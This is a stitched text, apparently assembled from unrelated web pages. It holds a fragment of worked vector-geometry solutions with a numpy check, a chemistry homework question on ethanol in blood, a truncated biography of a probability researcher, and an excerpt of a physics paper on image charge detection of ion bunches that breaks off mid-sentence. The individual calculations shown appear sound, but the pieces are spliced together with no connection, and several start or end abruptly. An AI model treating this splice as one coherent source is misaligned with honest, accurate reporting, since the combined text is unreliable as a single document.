\overrightarrow{{OC}}=-2\widehat{\text{i}}+\widehat{\text{j}}$. Find the unit vector in the direction of$ \displaystyle \ \overrightarrow{{OB}}$and$ \displaystyle \ \overrightarrow{{AC}}$. 
Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \ \ \overrightarrow{{OA}}=5\widehat{\text{i}}+3\widehat{\text{j}}\\\\\ \ \ \ \ \overrightarrow{{OC}}=-2\widehat{\text{i}}+\widehat{\text{j}}\\\\\ \ \ \ \ OABC\ \text{is a parallelogram}.\\\\\therefore \ \ \ \overrightarrow{{OB}}=\overrightarrow{{OA}}+\overrightarrow{{OC}}\ \ \ \left( {\because \text{parallelogram rule}\text{.}} \right)\\\\\ \ \ \ \ \overrightarrow{{OB}}=5\widehat{\text{i}}+3\widehat{\text{j}}-2\widehat{\text{i}}+\widehat{\text{j}}=3\widehat{\text{i}}+4\widehat{\text{j}}\\\\\therefore \ \ \ OB=\sqrt{{{{3}^{2}}+{{4}^{2}}}}=5\\\\\therefore \ \ \ \text{the unit vector in }\\\ \ \ \ \ \text{the direction of}\ \overrightarrow{{OB}}=\displaystyle \frac{{\overrightarrow{{OB}}}}{{OB}}\\\\\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{1}{5}\left( {3\widehat{\text{i}}+4\widehat{\text{j}}} \right)\\\\\ \ \ \ \ \ \text{Again}\ \overrightarrow{{AC}}=\overrightarrow{{OC}}-\overrightarrow{{OA}}\\\ \ \\\ \ \ \ \ \overrightarrow{{AC}}=\left( {-2\widehat{\text{i}}+\widehat{\text{j}}} \right)-\left( {5\widehat{\text{i}}+3\widehat{\text{j}}} \right)=-7\widehat{\text{i}}-2\widehat{\text{j}}\\\\\therefore \ \ \ AC=\sqrt{{{{{\left( {-7} \right)}}^{2}}+{{{\left( {-2} \right)}}^{2}}}}=\sqrt{{53}}\\\\\therefore \ \ \ \text{the unit vector in }\\\ \ \ \ \ \text{the direction of}\ \overrightarrow{{AC}}=\displaystyle \frac{{\overrightarrow{{AC}}}}{{AC}}\\\\\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{1}{{\sqrt{{53}}}}\left( {-7\widehat{\text{i}}-2\widehat{\text{j}}} \right)\end{array}$10. Given that the position vectors of the points$ \displaystyle A, B$and$ \displaystyle C$relative to origin$ \displaystyle O$are$ \displaystyle -\widehat{\text{i}}+\widehat{\text{j}}$,$ \displaystyle 5\widehat{\text{i}}+\widehat{\text{j}}$and$ \displaystyle p\widehat{\text{i}}+q\widehat{\text{j}}$respectively. If$ \displaystyle \Delta ABC$is equilateral, find the possible values of$ \displaystyle p$and$ \displaystyle q$. 
Show/Hide Solution $ \displaystyle \begin{array}{l}\ \ \ \ \ \overrightarrow{{OA}}=-\widehat{\text{i}}+\widehat{\text{j}}\\\\\ \ \ \ \ \overrightarrow{{OB}}=5\widehat{\text{i}}+\widehat{\text{j}}\\\\\ \ \ \ \ \overrightarrow{{OC}}=p\widehat{\text{i}}+q\widehat{\text{j}}\\\\\therefore \ \ \ \overrightarrow{{AB}}=\overrightarrow{{OB}}-\overrightarrow{{OA}}\\\\\ \ \ \ \ \ \ \ \ \ =6\widehat{\text{i}}\\\\\therefore \ \ \ AB=6\\\\\ \ \ \ \ \overrightarrow{{BC}}=\overrightarrow{{OC}}-\overrightarrow{{OB}}\\\\\ \ \ \ \ \ \ \ \ \ =\left( {p-5} \right)\widehat{\text{i}}+\left( {q-1} \right)\widehat{\text{j}}\\\\\ \ \ \ \ BC=\sqrt{{{{{\left( {p-5} \right)}}^{2}}+{{{\left( {q-1} \right)}}^{2}}}}\\\\\ \ \ \ \ \overrightarrow{{AC}}=\overrightarrow{{OC}}-\overrightarrow{{OA}}\\\\\ \ \ \ \ \ \ \ \ \ \ =\left( {p+1} \right)\widehat{\text{i}}+\left( {q-1} \right)\widehat{\text{j}}\\\\\ \ \ \ \ AC=\sqrt{{{{{\left( {p+1} \right)}}^{2}}+{{{\left( {q-1} \right)}}^{2}}}}\\\\\ \ \ \ \ \text{Since }\Delta ABC\ \text{is equilateral,}\\\\\ \ \ \ \ AB=BC=AC=6.\\\\\therefore \ \ \sqrt{{{{{\left( {p-5} \right)}}^{2}}+{{{\left( {q-1} \right)}}^{2}}}}=6\\\\\ \ \ \ {{\left( {p-5} \right)}^{2}}+{{\left( {q-1} \right)}^{2}}=36\\\\\ \ \ \ {{p}^{2}}+{{q}^{2}}-10p-2q=10\ ---(1)\\\\\ \ \ \ \text{Similarly,}\\\\\ \ \ \ \sqrt{{{{{\left( {p+1} \right)}}^{2}}+{{{\left( {q-1} \right)}}^{2}}}}=6\\\\\ \ \ \ {{\left( {p+1} \right)}^{2}}+{{\left( {q-1} \right)}^{2}}=36\\\\\ \ \ \ {{p}^{2}}+{{q}^{2}}+2p-2q=34\ ---(2)\\\\\ \ \ \ \text{By (2)}-\text{(1),}\\\text{ }\\\ \ \ \ 12p=24\\\\\therefore \ \ p=2\\\\\ \ \ \ \text{Substituting}\ p=2\text{ in (1),}\\\text{ }\\\therefore \ \ 4+{{q}^{2}}-20-2q=10\\\ \\\ \ \ \ {{q}^{2}}-2q=26\\\\\ \ \ \ {{q}^{2}}-2q+1=27\\\\\ \ \ \ {{(q-1)}^{2}}=27\\\\\ \ \ \ q-1=\pm \sqrt{{27}}\\\\\ \ \ \ q=1\pm 3\sqrt{3}\end{array}\$
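The following short numpy snippet is not part of the original problem set; it is only a quick numerical sanity check of the last result, assuming the values found above ($p=2$, $q=1\pm 3\sqrt{3}$) for $A(-1,1)$ and $B(5,1)$:

```python
import numpy as np

# Check of practice problem 10: with A(-1, 1), B(5, 1) and C(2, 1 ± 3*sqrt(3)),
# triangle ABC should come out equilateral with side length 6.
A = np.array([-1.0, 1.0])
B = np.array([5.0, 1.0])
for q in (1 + 3 * np.sqrt(3), 1 - 3 * np.sqrt(3)):
    C = np.array([2.0, q])
    AB = np.linalg.norm(B - A)
    BC = np.linalg.norm(C - B)
    AC = np.linalg.norm(C - A)
    print(f"q = {q:+.4f}:  AB = {AB:.4f},  BC = {BC:.4f},  AC = {AC:.4f}")
# Both choices of q print 6.0000 for all three side lengths.
```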
# Blood concentration of 0.065 M ethyl alcohol (EtOH) is sufficient to induce a coma: at this concentration, what is the total mass of alcohol in a person?

###### Question:

A blood concentration of 0.065 M ethyl alcohol (EtOH) is sufficient to induce a coma. At this concentration, what is the total mass of alcohol (in grams) in a person whose total blood volume is 7.12 L? The molar mass of EtOH is 46.0 g/mol. Calculate to one decimal place. Do not include units when reporting your answer. Use standard notation or scientific notation, e.g. 0.001 or 1E-3, not 10^-3.
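For reference (this worked line is an addition, not part of the original question page), the calculation asked for is a single molarity-to-mass conversion:

$\displaystyle m = cVM = 0.065\,\tfrac{\text{mol}}{\text{L}}\times 7.12\,\text{L}\times 46.0\,\tfrac{\text{g}}{\text{mol}}\approx 21.3\ \text{g}$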
# Dr. Santiago Saglietti ## Overview Santiago obtained his PhD in Probability from the University of Buenos Aires in 2014, under the supervision of advisors Pablo Groisman and Pablo Ferrari. Afterwards, he continued his research as a postdoc at Universidad de Buenos Aires (2015, Argentina) and Pontificia Universidad Católica (2016, Chile). He currently holds a postdoc fellowship at Technion University, under the supervision of Professor Dmitry Ioffe. Santiago has also worked as an Assistant Professor at Universidad Torcuato Di Tella (2015, Buenos Aires) and as a Teaching Instructor at Universidad de Buenos Aires (2008-2014, Buenos Aires). Santiago and his co-workers focus on four separate lines of research. A first line of research is centered on statistical mechanics and, more precisely, on perfect simulation algorithms for extremal Gibbs measures of interacting particle systems. Santiago's work on this topic consisted in realizing these extremal Gibbs measures as invariant distributions of some explicit Markovian dynamics and in finding perfect simulation algorithms to sample these invariant distributions exactly. As a consequence of these algorithms, one obtains a powerful simulation tool which can also be exploited from the theoretical point of view as a means of studying Gibbs measures via methods from the theory of stochastic processes. Recently, Santiago has also started doing research on Random Walks in Random Environments, which is also a popular model with ties to statistical mechanics. A second line of research is the study of metastability phenomena in stochastic partial differential equations. Namely, if one starts with the solution of a (deterministic) PDE which converges to some equilibrium state as time tends to infinity, it is a relevant problem to understand how this convergence is modified upon the addition of a small random noise. Under some particular assumptions on the unperturbed system, it can be shown that the perturbed system behaves in a metastable way: it spends a long time near this equilibrium and then makes an abrupt transition towards a different state. Santiago focused on studying metastability in this context for the particular case of PDEs with blow-up, in which many technical problems arise and the standard theory to address these questions cannot be used directly. A third line of research is centered on the study of branching Markovian dynamics. More precisely, Santiago has worked on establishing laws of large numbers for the empirical measures of supercritical branching processes in which particles not only branch (at a supercritical rate), but also evolve according to some prescribed Markovian motion. The fourth and final line of research is the study of random (homogeneous) fractal measures. Santiago has focused on understanding the macroscopic geometric properties of these random measures, like dimension and/or regularity, since they help to better understand the structure of non-homogeneous (but deterministic) fractal measures, which are central objects in geometric measure theory. ## Selected Publications Groisman, Pablo; Saglietti, Santiago. Small random perturbations of a dynamical system with blow-up. J. Math. Anal. Appl. 385 (2012), no. 1, 150-166. Galicer, Daniel; Saglietti, Santiago; Shmerkin, Pablo; Yavícoli, Alexia. $L^q$ dimensions and projections of random measures. Nonlinearity 29 (2016) 2609-2640. Fernández, Roberto; Groisman, Pablo; Saglietti, Santiago. 
Stability of gas measures under perturbations and discretizations. Rev. Math. Phys.  28 (2016), no. 10, 1650022, 46 pp. Groisman, Pablo; Saglietti, Santiago; Saintier, Nicolas. Metastability for small random perturbations of a PDE with blow-up. To appear in Stochastic Processes and their Applications. ## Research Metastability, Probabilistic methods in Statistical Mechanics, Branching Processes and Ergodic Geometric Measure Theory. ## Contact Info Room 317 Cooper Building +
# Detection of small bunches of ions using image charges ## Abstract A concept for detection of charged particles in a single fly-by, e.g. within an ion optical system for deterministic implantation, is presented. It is based on recording the image charge signal of ions moving through a detector comprising a set of cylindrical electrodes. This work describes theoretical and practical aspects of image charge detection (ICD) and detector design and its application in the context of real time ion detection. It is shown how false positive detections are excluded reliably, although the signal-to-noise ratio is far too low for time-domain analysis. This is achieved by applying a signal threshold detection scheme in the frequency domain, which - complemented by the development of specialised low-noise preamplifier electronics - will be the key to developing single ion image charge detection for deterministic implantation. ## Introduction Ion implantation has been widely used for decades, for example in semiconductor technology, and has recently enabled groundbreaking magnetometry and qubit experiments with e.g. NV-centres in diamond1,2,3,4,5 or single phosphorus atom devices in silicon6,7,8,9,10,11. For the fabrication of scalable quantum devices employing single atoms12, but also for semiconductor doping on the smallest scale, controlling the exact number of the implanted ions is decisive for device performance13. Different approaches have been pursued to realise the counting of a small number of single ions during implantation, but so far success is very limited14. The developed techniques can be categorised into pre-detection and post-detection schemes with regard to the implantation event. Whereas in a post-detection scheme, secondary processes initiated by the ion implantation are used for ion detection, a pre-detection scheme is characterized by an ion detection prior to implantation. The significant advantage is that detection efficiencies <100% can be allowed by simply discarding all undetected ions from implantation. The most prominent pre-detection approach is to store a single cooled ion in a Paul trap and accelerate it towards the sample, after its presence in the trap has been detected optically15,16. The main drawbacks, however, are the significant experimental effort and slow implantation rate. For post-detection, either secondary electrons13,17 or the induced charge of the impacting ion (IBIC)7,14 are used as the registration signal. For secondary electron detection and IBIC, the signal increases with the kinetic energy of the implanted ions, limiting the sensitivity for low ion energies. However, for a spatially highly precise ion placement, low kinetic energies are desirable, e.g. <5 keV for P in Si, to reduce ion straggling. Up to now, ion beam induced charge measurements have been demonstrated for P implantation in silicon with ion energies down to 14 keV7,14. As the sample has to serve as a detector in the case of IBIC, it will be difficult to apply induced charge detection to arbitrary sample materials and depending on the material system and ion type, there is always a minimum kinetic energy required for successful detection. 
Pacheco and co-workers, for example, achieved a detection efficiency of 87% for 20 keV Sb ion implantation into a silicon based device18. In comparison, in image charge detection, a pre-detection scheme, the sensitivity only depends on the number of charges to be detected, so that at very low ion kinetic energies it has the potential of becoming the only viable detection scheme. The ultimate goal is to devise a method that allows deterministic implantation of any ion species - in the extreme case a single ion - with nanometre resolution into arbitrary samples with high throughput. Besides limitations to specific materials and ions, every post-detection method necessarily has to guarantee a detection efficiency of 100% for single ion implantation, while at the same time no false positives are allowed. It is shown below, that with a dedicated pre-detection scheme, a detection efficiency smaller than 100% does not impair the feasibility of the method, while under this condition, false positive detection events can be avoided much easier. The approach presented in this work is based on the signal induction by the image charge of a moving ion19. The fact that moving charges can induce a measurable image charge current was noticed in the 1930s and has been described theoretically by Shockley and Ramo20,21. The idea of the presented detection scheme is based on results in the mass spectrometry of large, slow molecules carrying a high number of net charges. When a moving charge passes a single electrode, the charge signal induced in that electrode is a peak in the time domain. In image charge mass spectrometry, ions are commonly trapped and cycled next to, or through a single hollow electrode using a dedicated ion optical arrangement, so that a periodic signal can be recorded and analysed. In terms of the signal-to-noise ratio (SNR), repeating a measurement N times improves the sensitivity by $$\mathrm{1/}\sqrt{N}$$ for uncorrelated noise. This means that by increasing the trapping time or equivalently the number of cycles through the electrode, the sensitivity is improved. This is also equivalent to decreasing the frequency bandwidth of the recorded periodic signal. Benner demonstrated such a measurement with a detection limit of 250 elementary charges (e)22. By increasing the trapping time to 3 s, i.e. decreasing the bandwidth, the detection limit was decreased to 7e by Jarrold and co-workers23,24,25,26. For implantation at the nanoscale, ions have to be detected on their linear trajectory on the way to the sample. Any other, more complicated trajectory, for example cycling ions for longer measurement duration, is incompatible with the high demand, i.e. the low acceptance, of the ion optical system required for spatially precise implantation. A linear array of electrodes offers the possibility to create a periodic signal in a single ion pass. Experimental results based on linear detector arrays have been demonstrated as well27,28,29. As long as the signal-to-noise ratio permits, mass and charge can be extracted from the time-of-flight and amplitude of the signal. For example, Smith et al. used autocorrelation analysis of recorded raw data to extract this information, although the signal did not in general extend significantly above the noise floor28. Theoretically, the length of such a linear array can be scaled arbitrarily to reach a detection limit of 1e, if the signal analysis can be carried out in the frequency domain27. 
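To make the averaging/bandwidth argument above concrete, the following illustrative Python sketch shows the noise reduction obtained when a fixed signal is repeated and coherently averaged over N passes; all numbers (sampling rate, frequency, amplitudes) are made up for illustration and are not the parameters of any detector described here. Scaling the array length, i.e. the number of signal electrodes, plays the same role as increasing N in this toy model.

```python
import numpy as np

rng = np.random.default_rng(0)
fs, f0, n_samples = 1e8, 1e6, 4096          # sample rate [Hz], signal frequency [Hz], samples per pass
t = np.arange(n_samples) / fs
signal = 1e-3 * np.sin(2 * np.pi * f0 * t)  # "image charge" signal, arbitrary units
noise_rms = 10e-3                           # noise floor well above the signal amplitude

for n_passes in (1, 16, 256):
    # Coherently averaging N identical passes leaves the signal unchanged
    # but reduces uncorrelated noise by 1/sqrt(N).
    avg = np.mean([signal + rng.normal(0, noise_rms, n_samples)
                   for _ in range(n_passes)], axis=0)
    snr = np.std(signal) / np.std(avg - signal)
    print(f"N = {n_passes:4d}  ->  SNR ≈ {snr:.2f}")   # grows roughly as sqrt(N)
```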
In practice, however, the length is limited, for example, due to ion beam divergence. In comparison to previous work on mass spectrometry, the image charge detector (ICD) envisaged for ion implantation works in a completely different kinetic energy regime, i.e. the ions possess much faster velocities, much lower mass and generally a lower number of charges per ion. Furthermore, in contrast to the literature reviewed, real time signal analysis methods need to be explored that enable a proper pre-detection of the ion on its way to the sample. On the other hand, ion implantation has the decisive advantage that all parameters of the ions to be detected are known, whereas mass spectrometry has the aim of measuring unknowns. In this paper, the concept and optimal conditions for the application of image charge detection for deterministic implantation are explored. After a brief summary and review of image charge detector theory, our experimental results are presented, followed by a discussion of the possibilities for signal processing to realise a fast trigger output in case of successful detection. We believe that the presented study provides the starting point for the realisation of a single ion image charge detector. ## Theoretical Considerations First theoretical considerations about the instantaneous currents induced by moving electrons were presented by Shockley and Ramo20,21. For an arbitrary arrangement of moving charges and grounded electrodes, they derived the expression $${q}_{i}=-\,e{{\rm{\Phi }}}_{i}({\bf{r}})$$ (1) for the charge q i induced in a given electrode by a unit charge e at location r. The so called weighting potential Φi is calculated by setting the respective electrode to unit potential (V = 1, dimensionless) and all other electrodes to ground. If the point charge is moving with velocity v = dr/dt, it follows for the induced current $${I}_{i}=\frac{{\rm{d}}{q}_{i}}{{\rm{d}}t}=-\,e\nabla {{\rm{\Phi }}}_{i}({\bf{r}})\cdot \frac{{\rm{d}}{\bf{r}}}{{\rm{d}}t}=e{{\bf{E}}}_{{\rm{i}}}({\bf{r}})\cdot {\bf{v}}\mathrm{.}$$ (2) Here, the weighting field Ei has the unit m−1. The original derivations all refer to electrons, but if one considers an ion with more than one unit of charge, the elementary charge e in Eq. 2 is only multiplied by the number of charges. For demonstration, an ion is considered on a straight trajectory, travelling through an arrangement of three cylindrical electrodes, similar to an einzel lens (see Fig. 1a). The weighting potential is calculated with SIMION30 by setting the central electrode to unit potential (Fig. 1b). The potential along the ion trajectory is shown in Fig. 1c, together with the weighting field, i.e. its spatial derivative. In this example, the weighting potential reaches a value of about 0.9 at the centre of the electrode. This means that the maximum induced image charge is 0.9 times the charge of the ion. This factor and the distribution of the potential solely depend on the geometry of the electrode arrangement. As stated above in Eq. 2, the induced current is proportional both to the weighting field (red curve in Fig. 1c) and the ion velocity in the direction of this field. In addition, when measured, the signal formed in an electrical circuit connected to such an electrode will also depend on the type and characteristics of amplification. A transimpedance preamplifier produces a voltage signal proportional to the instantaneous current. Thus, the signal shape and amplitude are directly linked to the weighting field. 
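As a rough numerical illustration of Eqs. (1) and (2), the sketch below evaluates the induced charge and current for a singly charged ion crossing a single electrode on the axis. The logistic-edge weighting potential used here is only an assumed stand-in with a 0.9 plateau; the actual weighting potential in this work is computed with SIMION, and the numbers serve illustration only.

```python
import numpy as np

e = 1.602176634e-19          # elementary charge [C]

def weighting_potential(z, center=0.0, length=8e-3, rise=1e-3):
    """Assumed smooth stand-in for the weighting potential of one cylindrical
    electrode (plateau of ~0.9 inside, falling off at the ends). Not the
    field solution used in the paper, which is obtained with SIMION."""
    edge = lambda x: 1.0 / (1.0 + np.exp(-x / rise))
    return 0.9 * (edge(z - (center - length / 2)) - edge(z - (center + length / 2)))

v = 1.55e5                   # ion velocity [m/s], e.g. 5 keV Ar+ as quoted later in the text
t = np.linspace(-1e-7, 1e-7, 2001)
z = v * t                    # straight trajectory through the electrode centre

q_induced = e * weighting_potential(z)   # Eq. (1), magnitude for a singly charged ion
i_induced = np.gradient(q_induced, t)    # Eq. (2): induced current is dq/dt

print(f"peak image charge: {q_induced.max()/e:.2f} e, "
      f"peak current: {np.abs(i_induced).max():.2e} A")
```

The peak signal is set by the plateau of the weighting potential, while the peak current is set by how steep the weighting field is at the electrode ends.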
For the latter to be increased, the electrode spacing would have to be reduced to achieve a higher gradient in the potential. However, this cannot be taken to extremes, because in practice, the rise time of the preamplifier is a strict limitation. The signal of a charge sensitive preamplifier, having a capacitor Cf as feedback component parallel to an operational amplifier, will be directly proportional to the weighting potential. The sensitivity is given by Cf and the image charge qi, such that the output voltage is $$V_{\rm out} = \frac{q_{\rm i}}{C_{\rm f}}.$$ (3) However, there are important restrictions. As the gain of the preamplifier is only given by Cf and the total input noise is amplified as well, the optimum signal-to-noise ratio depends both on the noise characteristics of the preamplifier input and the total capacitance at the input. A voltage preamplifier reacts directly to the voltage on the electrodes, which results from the image charge and the total capacitance, comprising the capacitance of the electrode with respect to ground and the input capacitance of the preamplifier electronics, given by $$V_{\rm out} = \frac{q_{\rm i}}{C_{\rm total}}.$$ (4) If the electrode structure outlined so far is repeated in a linear array so that every even electrode is connected to the preamplifier input and the odd electrodes in between are grounded, an alternating signal results from a single ion passage. The geometry of the electrode array can be adjusted to yield a sinusoidal signal shape which effectively results in an AC voltage pulse with the finite duration determined by the ion velocity and the electrode array length. The amount of energy in the fundamental Fourier component and the bandwidth, given by the inverse of the duration of the signal, determine how well it can be recovered from noise. ## Experimental Methods A schematic of the set-up for image charge detection measurements is shown in Fig. 2. The whole set-up is mounted in a vacuum chamber evacuated to a base pressure of 1 × 10⁻⁶ mbar. An ion beam is created and focussed by a SPECS ion source ionising Argon, Nitrogen or other gases with thermally emitted electrons. Ions are accelerated to kinetic energies in the range from 1 to 5 keV and selected using a Wien filter. The beam blanker is controlled with a fast high voltage switch with a maximum potential of 500 V. In order to study the charge sensitivity of the detection set-up, ion bunches of sufficiently short duration are used to mimic ions of high charge state. For this purpose, rectangular voltage pulses are employed to form and transmit bunches of ions through the aperture. The rise time of the actual potential at the beam blanker plate was verified to be <25 ns. From the aperture system, the ion bunches move through the image charge detector (ICD) and into the Faraday cup (FC) used to measure the ion beam current with a Keithley 6485 Picoammeter. All cables inside and outside the chamber are shielded. The ICD signal is preamplified and analysed with a Rohde & Schwarz RTO2024 digital oscilloscope. In this work, two ICD systems were designed and studied. The first one (ICD1) is based on the Amptek A250 charge sensitive preamplifier and the second one (ICD2) uses the A250CF version of the preamplifier31,32. The results and discussion in this paper are focussed on the ICD2 set-up. Technical information about ICD1 and some results can be found in the supplementary material.
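To make the relation between weighting potential, induced charge and preamplifier output more concrete, the following short Python sketch evaluates Eqs. 1 and 3 for a single electrode. It is only an illustration: the weighting-potential profile is an assumed Gaussian-shaped stand-in for the SIMION result of Fig. 1c (peak value of about 0.9, width of the order of the electrode length), not the authors' simulated geometry.

```python
# Minimal sketch (not the authors' SIMION model): image charge induced on a
# single electrode and the corresponding charge-sensitive preamplifier output,
# following Eqs. 1 and 3. The weighting potential below is an assumed stand-in.
import numpy as np

E_CHARGE = 1.602e-19      # elementary charge in C
N_CHARGES = 1             # ion charge state
C_F = 0.5e-12             # feedback capacitance, 0.5 pF as quoted for the A250CF

x = np.linspace(-20e-3, 20e-3, 2001)           # position along the trajectory in m
phi = 0.9 * np.exp(-0.5 * (x / 4e-3) ** 2)     # assumed weighting potential (peak ~0.9)

q_induced = N_CHARGES * E_CHARGE * phi         # magnitude of induced image charge, Eq. 1
v_out = q_induced / C_F                        # preamplifier output voltage, Eq. 3

print(f"peak image charge   : {q_induced.max():.2e} C")     # about 0.9 e
print(f"peak output voltage : {v_out.max() * 1e6:.2f} uV")  # about 0.3 uV per charge
```

With the nominal 0.5 pF feedback capacitance, a singly charged ion therefore produces an output pulse of only a few hundred nanovolts, which is why bunches of ions (or, in future, highly charged ions) are used in the experiments described below.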
In the ICD2 version, the preamplifier electronics is included in the A250CF package outside the chamber, connected to the detector array by BNC cables. The A250CF has a Peltier cooled input transistor and its feedback components are Cf = 0.5 pF and Rf = 1 GΩ. A buffer amplifier stage is built in between preamplifier and output (see Fig. 2b). Due to these specifications, ICD2 shows superior noise performance compared to ICD1. At the same time, it is less susceptible to electromagnetic interference problems, for example, from the beam blanker system, because it is placed outside the chamber. Within the ICD2 set-up, the number of electrodes and their lengths can be varied flexibly for the different types of experiments presented here, where the electrodes connected to the preamplifier are referred to as signal electrodes. All electrodes are made of copper and have a length of L = 8 mm, an inner diameter of 3.8 mm and an outer diameter of 5 mm. Neighbouring electrodes are separated by d = 2 mm insulating spacers. At first, for the charge calibration measurements, a single signal electrode is used (ICD2.1). For the formation of a periodic signal, several signal electrodes are used with every second electrode being a signal electrode and the separating electrodes being grounded. Hence, the maximum number of signal electrodes is five (ICD2.5), because in total ten electrodes can be accommodated in the electrode support of ICD2. In Fig. 2b, the three different electrode arrangements used are shown (without insulating spacers and holders). The schematic shows the simplified preamplifier electronics as it is connected to the signal electrodes in each case. The red curve at ICD2.1 is the current signal of an ion bunch travelling through the single signal electrode. The integrating circuit of the A250CF charge-sensitive preamplifier transforms it into the indicated voltage pulse Vout. The detailed signal shape, however, depends also on the length of the ion bunch. For more than one signal electrode the voltage pulse is repeated, forming a periodic signal which can be similar to a sinusoidal signal for ion bunches much shorter than the length of an electrode. Notice that, due to the integration of the two opposite current pulses as the ions enter and leave each signal electrode, the total induced charge is zero. Therefore, there is no exponential decay of the output voltage pulse as observed in standard photon or particle detection using similar preamplification. Also, the rise time of the preamplifier, which is on the order of 10 ns, is no limitation to the measurements presented. ### Data availability The datasets generated and analysed in this work are available from the corresponding author on reasonable request. ## Results In order to evaluate the functionality of the electronic system comprising the detector electrodes, preamplifier and their connections, different quantitative and qualitative measurements are necessary. First, a single electrode (ICD2.1) is used to determine the calibration factor of output voltage Vout to input number of charges. Then, the possibilities of combining a number of electrodes (ICD2.3, ICD2.5) at the input of a single preamplifier stage are explored, together with noise measurements and considerations of signal processing and real time analysis. ### Ion beam current calibration At Ebeam = 5 keV, the velocity of Argon ions with an atomic mass of 40 u is vi = 1.55 × 10⁵ m/s, and so an electrode with L = 8 mm is traversed in $$t_{\rm E}\approx 50\,\mathrm{ns}$$.
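As a quick plausibility check of these numbers (not part of the original analysis), the velocity and traversal time follow directly from the non-relativistic kinetic energy:

```python
# Velocity of a 5 keV Ar+ ion (mass 40 u) and time to traverse one 8 mm electrode.
import math

E_KIN = 5e3 * 1.602e-19    # 5 keV in J
M_ION = 40 * 1.661e-27     # 40 u in kg
L_ELECTRODE = 8e-3         # electrode length in m

v_ion = math.sqrt(2 * E_KIN / M_ION)
t_traverse = L_ELECTRODE / v_ion

print(f"v_i = {v_ion:.2e} m/s")            # ~1.55e5 m/s
print(f"t_E = {t_traverse * 1e9:.0f} ns")  # ~50 ns
```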
To calibrate the ICD response to the number of charges inside an electrode, long pulses (tpulse > tE) are used with a single signal electrode mounted and connected to the input of the preamplifier (ICD2.1). In this way, the electrode’s weighting potential is completely filled with a uniform distribution of charges and its integral yields the total effective image charge (similar reasoning was used in ref.33) $$Q_{\rm icd} = \frac{I_{\rm beam}}{v_{\rm i}}\int_{-\infty}^{\infty}\Phi_{\rm i}(x)\,\mathrm{d}x.$$ (5) To measure the ion beam current accurately and simultaneously during calibration, anti-pulses are used, i.e. the continuous beam is interrupted for a duration tpulse > tE, as only the step height between “beam on” and “off” is of interest. The interrupting anti-pulse is repeated with a frequency of 1 kHz. Thus, the total average current is only lowered by a factor of 2 in 1000 for a 2 µs long anti-pulse, and quick averaging of 100 single acquisitions is possible. Figure 3 shows the linear calibration of the output voltage as a function of ion beam current for ICD2. The notation Vout refers to the voltage as a function of time as measured by the oscilloscope, while Vicd is the height of the signal plateau as indicated in the graph. A typical result from averaging 100 pulses to determine the signal height Vicd is shown in Fig. 3 (inset). The signal plateau waveform is superimposed with statistical and systematic noise contributions. The two high frequency pulses at 0 µs and 2.0 µs are interferences from the fast switching of the beam blanker. The time between the first switching (at 0 µs) and the falling edge of the signal (at 0.7 µs) is the time of ion travel from beam blanker to the ICD signal electrode. The calibration curve in Fig. 3 is shown with its linear fit. Due to a dominant low frequency statistical noise component, the calibration was affected by systematic averaging errors introduced by an unstable baseline. To counteract this, the number of averaged waveforms was lowered in some cases, which explains the observed deviations from perfect linearity. This low-frequency noise is, however, not expected to impair the detection of individual ion bunches in the following. With the slope Vicd/Ibeam determined from the fit, the experimental sensitivity S can be calculated using Eqs 5 and 6. $$S = \frac{V_{\rm icd}/I_{\rm beam}}{Q_{\rm icd}/I_{\rm beam}}.$$ (6) For ICD2.1, with $$\int_{-16\,\mathrm{mm}}^{84\,\mathrm{mm}}\Phi(x)\,\mathrm{d}x = 9.94\,\mathrm{mm}$$, a sensitivity of S = 3.16 V/pC is calculated. The integral corresponds to the integral in Eq. 5 and is determined along a trajectory coinciding with the ion optical axis from numerical SIMION simulations using the actual electrode geometries. The integration boundaries are given with respect to the centre of the electrode and limited by the size of the simulation. Nominally, the ICD2 preamplifier electronics has a sensitivity of 4.0 V/pC. The theoretical value is not reached in the experiment, which is attributed to uncertainties in the electronic components and impedance mismatches along the signal path. Nevertheless, the calibration is very well reproducible as long as the set-up is not changed, and it is valid for all ICD2 configurations. ### Time domain detection If n electrodes are connected to the preamplifier input (compare Fig.
2b), the profile of the weighting potential should effect n peaks in the time domain signal, in case the ion bunch is shorter than the distance between two signal electrodes. Experimental confirmation for three electrodes (ICD2.3) is shown in the graph in Fig. 4 for ion bunches produced from a 3 keV Ar+ ion beam of 2.6 nA current. The time-of-flight between the electrodes is in agreement with calculation. Further measurements using two signal electrodes to determine the time of flight for different ion species and kinetic energies can be found in the supplementary material. ### Frequency domain detection and noise For frequency domain analysis, the maximum number of five signal electrodes was used (ICD2.5). Small 2 keV argon bunches produced from a 2.5 nA beam current were sent through the electrodes. The resulting periodic signal can easily be transformed into an FFT spectrum, as demonstrated in Fig. 5a. In this case, the time trace is recorded with full bandwidth and the FFT is performed live with the oscilloscope. Despite the included switching interferences and the short signal pulse, a clear peak rises above the background spectrum at 4.72 MHz. The velocity of the ions is calculated from the peak frequency and the known electrode arrangement, i.e. 20 mm periodic length. Taking into account the acceleration voltage, the ion mass can be calculated, making this experiment effectively a mass spectrometry measurement. Calculated velocities of ions with different kinetic energies are plotted in comparison with nominal values in Fig. 5b. Good agreement is demonstrated, but the fact that all values are slightly lower than the calculated ones points to a yet unknown systematic error in the set-up. Possible sources of this error are the reliability of setting the accelerating potential in the ion source, the Wien filter settings and probably also the FFT algorithm used. The sensitivity, that is the minimum number of charges detectable, depends on the noise of the preamplifier electronic system which includes the detector electrodes. Noise measurements of the two set-ups ICD1 and ICD2 reveal the differences in noise characteristics under different operating conditions. Measurements and explanations regarding ICD1 can be found in the supplementary material. The data from ICD2 is shown in Fig. 6. A digital 100 MHz low-pass filter was applied. The root-mean-square (rms) noise voltage as a function of the number N of individual acquisitions used for averaging follows the theoretically predicted statistical behaviour over a wide range of N (Fig. 6). This proves that significant contributions from systematic noise sources and interferences have been excluded by optimising the system and digital filtering. The frequency domain opens up the possibility to recover a signal from noise. Whereas in the time domain, a signal becomes recognisable only if it significantly exceeds the total rms noise level (noise floor), in frequency analysis, the SNR can be given as a function of the spectral noise density νrms and the fundamental frequency component Vpeak, together with its bandwidth Δf which results from the finite signal duration. Consequently, it can be taken as 